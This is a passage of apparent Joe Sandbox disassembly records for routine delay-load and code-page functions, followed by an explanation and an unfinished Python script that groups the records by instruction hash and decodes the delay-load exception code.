                                                                                                                    • Opcode ID: ed26336c00438ff856d802e97b657628a5c8401a7e1fe48577a3bc69914d18aa
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: ed26336c00438ff856d802e97b657628a5c8401a7e1fe48577a3bc69914d18aa
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 6691b629cb521baf2fb49f60ad3cc41638fad42033bcb979cb397de27139cdd9
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: 6691b629cb521baf2fb49f60ad3cc41638fad42033bcb979cb397de27139cdd9
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: ebbc6974238ae7cfe81edabedb848a7cb7551fe1493122d8e9ff692024a50d41
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: ebbc6974238ae7cfe81edabedb848a7cb7551fe1493122d8e9ff692024a50d41
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 5764c8f217d37d71d1139ef77890276abfd18a992d9be3cfa3b191cecdbc4d2c
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: 5764c8f217d37d71d1139ef77890276abfd18a992d9be3cfa3b191cecdbc4d2c
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: ecb7a9a150c1725d175fb14d1ee9e0185a1bed980b12a88f27e8393a1a041077
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: ecb7a9a150c1725d175fb14d1ee9e0185a1bed980b12a88f27e8393a1a041077
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 630ebac7f38c64780a3557ac9abfb0231d8f2c1627eba8568fd00f91c8cdbb50
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: 630ebac7f38c64780a3557ac9abfb0231d8f2c1627eba8568fd00f91c8cdbb50
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E580
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Fjun
                                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                                    • Opcode ID: 4a8e975e035aa068147a072f232ae7fc0c1dc32087209dbe047502ff7f06e684
                                                                                                                    • Instruction ID: 8184d1bb596911c1c1fb366a2a237f8b1586d756879772ad08e8fd77e33c1705
                                                                                                                    • Opcode Fuzzy Hash: 4a8e975e035aa068147a072f232ae7fc0c1dc32087209dbe047502ff7f06e684
                                                                                                                    • Instruction Fuzzy Hash: 16A011C22AA202BC300822A0BC02C3B020CE0C8FA0330BA2EF802A0280A88008000830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E580
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Fjun
                                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                                    • Opcode ID: 19d6840d4b565304f1fd2ecff208bda8f2c3b99a3be4dd25a48a3d5aa7618525
                                                                                                                    • Instruction ID: 8184d1bb596911c1c1fb366a2a237f8b1586d756879772ad08e8fd77e33c1705
                                                                                                                    • Opcode Fuzzy Hash: 19d6840d4b565304f1fd2ecff208bda8f2c3b99a3be4dd25a48a3d5aa7618525
                                                                                                                    • Instruction Fuzzy Hash: 16A011C22AA202BC300822A0BC02C3B020CE0C8FA0330BA2EF802A0280A88008000830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<
                                                                                                                    • API String ID: 1269201914-576538559
                                                                                                                    • Opcode ID: 0037d3d37956e866f12223bc5353e05c24415bfbbf703093fda51e268dd9ee94
                                                                                                                    • Instruction ID: 40da50707a4db0ea5d78a62eb961602fccacb8aa460204af787866f1e869f685
                                                                                                                    • Opcode Fuzzy Hash: 0037d3d37956e866f12223bc5353e05c24415bfbbf703093fda51e268dd9ee94
                                                                                                                    • Instruction Fuzzy Hash: 7DA011C2AA8202BC38082202BC02C3F020EE8CAFA0330B82EF802A0280A8802C000832
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E580
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Fjun
                                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                                    • Opcode ID: 7f848bac0bc78d71a322a75edecdb82158cb67384a5ce75f207da3003326bfe0
                                                                                                                    • Instruction ID: 3d71f87da777d9ac4ec5f4807d8ee7b3fc5989b21e4767974c4b9907bdc198e7
                                                                                                                    • Opcode Fuzzy Hash: 7f848bac0bc78d71a322a75edecdb82158cb67384a5ce75f207da3003326bfe0
                                                                                                                    • Instruction Fuzzy Hash: D0A011C22EA2003C300822A0BC02C3B020CE0C0F22330B22EF802B0280A88008000830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<
                                                                                                                    • API String ID: 1269201914-576538559
                                                                                                                    • Opcode ID: 6c979f0609804421d01eb7c5bd610e5b91d3c00f968219a43aed5486babfa521
                                                                                                                    • Instruction ID: 40da50707a4db0ea5d78a62eb961602fccacb8aa460204af787866f1e869f685
                                                                                                                    • Opcode Fuzzy Hash: 6c979f0609804421d01eb7c5bd610e5b91d3c00f968219a43aed5486babfa521
                                                                                                                    • Instruction Fuzzy Hash: 7DA011C2AA8202BC38082202BC02C3F020EE8CAFA0330B82EF802A0280A8802C000832
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<
                                                                                                                    • API String ID: 1269201914-576538559
                                                                                                                    • Opcode ID: 27893e3a252febd8352329a32ea42e30c72bb22dbcb742bf3eff3a29b16537d2
                                                                                                                    • Instruction ID: 40da50707a4db0ea5d78a62eb961602fccacb8aa460204af787866f1e869f685
                                                                                                                    • Opcode Fuzzy Hash: 27893e3a252febd8352329a32ea42e30c72bb22dbcb742bf3eff3a29b16537d2
                                                                                                                    • Instruction Fuzzy Hash: 7DA011C2AA8202BC38082202BC02C3F020EE8CAFA0330B82EF802A0280A8802C000832
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<
                                                                                                                    • API String ID: 1269201914-576538559
                                                                                                                    • Opcode ID: 48fbb3d1ec9b50fda1a0270060bc828bbf923059179fbfce979b9aef5aafbdee
                                                                                                                    • Instruction ID: 40da50707a4db0ea5d78a62eb961602fccacb8aa460204af787866f1e869f685
                                                                                                                    • Opcode Fuzzy Hash: 48fbb3d1ec9b50fda1a0270060bc828bbf923059179fbfce979b9aef5aafbdee
                                                                                                                    • Instruction Fuzzy Hash: 7DA011C2AA8202BC38082202BC02C3F020EE8CAFA0330B82EF802A0280A8802C000832
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E5B7BB: GetOEMCP.KERNEL32(00000000,?,?,00E5BA44,?), ref: 00E5B7E6
                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00E5BA89,?,00000000), ref: 00E5BC64
                                                                                                                    • GetCPInfo.KERNEL32(00000000,00E5BA89,?,?,?,00E5BA89,?,00000000), ref: 00E5BC77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 546120528-0
                                                                                                                    • Opcode ID: 767472a3ca6e4aca48421ea5febd5230199238c6429c4478dcc21645d56252a0
                                                                                                                    • Instruction ID: f2b2336cc556d75158d46ce165899f43a2bd1288f555e2fc0d55d1d33cf4b4ec
                                                                                                                    • Opcode Fuzzy Hash: 767472a3ca6e4aca48421ea5febd5230199238c6429c4478dcc21645d56252a0
                                                                                                                    • Instruction Fuzzy Hash: 915146709002459EDB248F75C8816BBFBF4EF41305F18686ED896BB251D735994DCB90
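The records above are Joe Sandbox's per-function disassembly summaries. The same delay-load thunk (a call to ___delayLoadHelper2@8 whose subcall 00E4E85D ends in RaiseException with code C06D0057) appears several times under different Opcode IDs but with identical Instruction IDs, which is how the report tells you those entries are the same code at different addresses. The Python below is an added example, not part of the report or of Joe Sandbox. It parses records in this shape, groups them by Instruction ID to surface the shared stubs, lists which records reach RaiseException, and decodes the exception code using the VcppException layout from delayimp.h (severity bits, facility 0x6D, a Win32 error code in the low 16 bits). Assumptions: the embedded SAMPLE is a constructed, trimmed excerpt of the records above; a record is taken to start at each "APIs" line; the error-name table covers only three codes.

```python
import re
from collections import defaultdict

# Constructed, trimmed excerpt in the shape of the report's per-function records.
SAMPLE = """\
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E580
  • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: Fjun
• Opcode ID: 4a8e975e035aa068147a072f232ae7fc0c1dc32087209dbe047502ff7f06e684
• Instruction ID: 8184d1bb596911c1c1fb366a2a237f8b1586d756879772ad08e8fd77e33c1705
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Similarity
• String ID: Fjun
• Opcode ID: 19d6840d4b565304f1fd2ecff208bda8f2c3b99a3be4dd25a48a3d5aa7618525
• Instruction ID: 8184d1bb596911c1c1fb366a2a237f8b1586d756879772ad08e8fd77e33c1705
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E4E580
  • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
Similarity
• String ID: PDu<
• Opcode ID: 0037d3d37956e866f12223bc5353e05c24415bfbbf703093fda51e268dd9ee94
• Instruction ID: 40da50707a4db0ea5d78a62eb961602fccacb8aa460204af787866f1e869f685
APIs
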